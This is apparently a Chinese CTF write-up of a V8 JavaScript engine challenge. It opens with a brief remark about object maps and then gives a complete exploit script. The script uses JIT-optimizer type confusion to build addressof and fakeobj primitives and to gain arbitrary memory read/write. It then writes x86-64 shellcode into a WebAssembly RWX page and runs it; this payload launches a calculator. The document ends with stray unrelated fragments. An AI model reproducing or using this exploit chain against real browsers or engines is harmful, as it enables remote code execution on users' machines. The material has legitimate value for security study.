第一次知道原来各种map也是申请的一段连续的内存空间来存储,所以必要的时候可以通过固定偏移来从一种map获取到另一种map。但是要注意这里的获取的时候要保证对象不被释放。
这也是做的第一道涉及优化器的题目,收货很多
class Memory{constructor(){this.buf = new ArrayBuffer(8);this.f64 = new Float64Array(this.buf);this.u32 = new Uint32Array(this.buf);this.bytes = new Uint8Array(this.buf);}d2u(val){ //double ==> Uint64this.f64[0] = val;let tmp = Array.from(this.u32);return tmp[1] * 0x100000000 + tmp[0];}u2d(val){ //Uint64 ==> doublelet tmp = [];tmp[0] = parseInt(val % 0x100000000);tmp[1] = parseInt((val - tmp[0]) / 0x100000000);this.u32.set(tmp);return this.f64[0];}
}
function hex(i)
{return i.toString(16).padStart(16, "0");
}
var store=[];
var mem=new Memory();
function readmap_()
{var map_obj=[1.1,2.2,3.3];var map_tmp={x:3};return [map_obj[map_tmp.x],map_obj,map_tmp];
}
function readmap()
{for(let i=0;i<12000;i++)readmap_();return readmap_()[0];
}
var float_map=mem.d2u(readmap());
var obj_map=float_map+0xa0;
console.log("[*] float_map is 0x"+hex(float_map));
console.log("[*] obj_map is 0x"+hex(obj_map));
var float_mapp=mem.u2d(float_map);
var obj_mapp=mem.u2d(obj_map);function fakeobj_(address)
{var arr_1=[address,address,address];var tmp_1={x:3};arr_1[tmp_1.x]=obj_mapp;return arr_1;
}
function fakeobj(address)
{for(let i=0;i<12000;i++){var tmp=fakeobj_(address);}return tmp[0];
}
var float_obj=fakeobj(float_mapp);
function addressof_(object)
{var arr_2=[object,object,object];var tmp_2={x:3};arr_2[tmp_2.x]=float_obj;return arr_2;
}
function addressof(object)
{for(let i=0;i<12000;i++){var tmp=addressof_(object);}return tmp[0];
}
var objt={'a':1};
var arbf=new ArrayBuffer(0x1234);
var obj={'a':mem.u2d(0x5678)};
var fakeArray=[float_mapp,mem.u2d(0),mem.u2d(0),mem.u2d(0x100000000000),1.1,2.2
].slice(0);
var fakeArrayaddr=mem.d2u(addressof(fakeArray));
fakeArray[2]=mem.u2d(fakeArrayaddr);
var victim=fakeobj(mem.u2d(fakeArrayaddr+0x190));
console.log("[*] fakeArrayaddr is "+hex(fakeArrayaddr));
//console.log("[*] victim length is 0x"+hex(victim.length));
var buf_idx=0;
var obj_idx=0;
var max_idx=0x300;
for(let i=0;i<max_idx;i++)
{let t=mem.d2u(victim[i]);if(t==0x1234)buf_idx=i+1;if(t==0x5678)obj_idx=i;
}
class ArbitraryRW
{addressof(newobj){obj.a=newobj;return mem.d2u(victim[obj_idx]);}read64(address){victim[buf_idx]=mem.u2d(address);var dt=new DataView(arbf);return mem.d2u(dt.getFloat64(0,true));}
}
var arw=new ArbitraryRW();
var objarray=[objt,objt];
var objaddr=arw.addressof(objt);
console.log("[*] objaddr is 0x"+hex(objaddr));
console.log("[*] buf_idx is 0x"+hex(buf_idx));
console.log("[*] obj_idx is 0x"+hex(obj_idx));
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
let wasmFunc = wasmInstance.exports.main;
var inst_addr=arw.addressof(wasmInstance);
var rwx_addr=arw.read64(inst_addr+0x88-1);
console.log("[*] inst_addr is 0x"+hex(inst_addr));
console.log("[*] rwx_addr is 0x"+hex(rwx_addr));//write shellcode to the rwx address
victim[buf_idx]=mem.u2d(rwx_addr);
var dt=new DataView(arbf);
const shellcode = new Uint8Array([0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x68,0x2d,0x63,0x00,0x00,0x48,0x89,0xe6,0x52,0xe8,0x1c,0x00,0x00,0x00,0x44,0x49,0x53,0x50,0x4c,0x41,0x59,0x3d,0x3a,0x30,0x20,0x67,0x6e,0x6f,0x6d,0x65,0x2d,0x63,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72,0x00,0x56,0x57,0x48,0x89,0xe6,0x0f,0x05]);
for (var i=0;i<shellcode.length;i++) {dt.setUint8(i,shellcode[i], true);
}
wasmFunc();
)
)
——热管理系统)
